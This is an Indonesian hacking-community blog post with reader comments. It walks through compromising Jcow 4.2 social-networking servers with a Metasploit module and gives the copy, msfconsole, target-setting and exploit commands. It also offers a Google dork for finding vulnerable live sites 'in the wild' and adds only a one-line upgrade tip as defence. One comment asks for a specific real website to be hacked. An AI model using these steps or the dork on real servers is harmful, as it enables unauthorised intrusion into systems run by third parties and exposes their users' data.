Rabu, 18 Januari 2012

Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Jcow Social Networking Webserver

10 September 2011
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner



442
 
16
 
460
share

Apakah teman-teman pernah melihat CMS yang satu ini?

Jcow social networking…Ya, memang demikian namanya… Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1 MB.

Jcow

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2

Pada artikel ini juga saya sebelumnya sudah membuat username : “victim dan password :”victim” pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb (link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow

3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.

msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.

Berhasil

Pengamanan :
1. Upgrade Jcow ke versi terbaru

Sumber : vishnuvalentino.com

BINUS HACKER Binus Hacker Chat and Forum

Komentar

8 Komentar Untuk “Hacking Jcow Social Networking Webserver
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. LH pada 10 September 2011 7:34 am

    ada postingan bru,
    bgus gan

  2. junior pada 10 September 2011 5:11 pm

    weww,, mantap gan,,

  3. gann pada 12 September 2011 4:00 am

    sadisss…….mantap gan…

  4. RootBearCool pada 12 September 2011 9:34 am

    gan sorry nih OOT dkit pengen nanya dong cara install Backtrack 5 R1 dari usb/dvd/cd caranya gmn y>?

  5. HATTAFGEN pada 14 September 2011 5:26 am

    ITU JCOW SAPA ,SIAPA YANG BUAT,???

  6. ogel pada 10 October 2011 6:02 am

    ikutan belajar dong tentang hakkr nya??

  7. Kondong pada 11 December 2011 1:41 am

    Mohon pak di hack site malay ni http://xtweets.tk user2nya tidak enak smuanya

  8. supri slankers pada 16 December 2011 6:52 pm

    mau dong jd angota hacker, n belajar byk…

Silahkan Berikan Tanggapan Anda...